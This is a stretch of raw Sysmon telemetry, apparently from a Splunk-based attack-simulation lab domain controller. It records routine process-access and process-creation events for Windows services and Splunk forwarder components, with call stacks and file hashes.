14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.829{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.828{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.218{59A5CD1D-94CA-6005-4805-00000000A301}41605916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.062{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.063{59A5CD1D-94CA-6005-4805-00000000A301}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:47.078{59A5CD1D-94CA-6005-4905-00000000A301}60086816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.843{59A5CD1D-94CC-6005-4B05-00000000A301}59724916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CC-6005-4B05-00000000A301}5972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 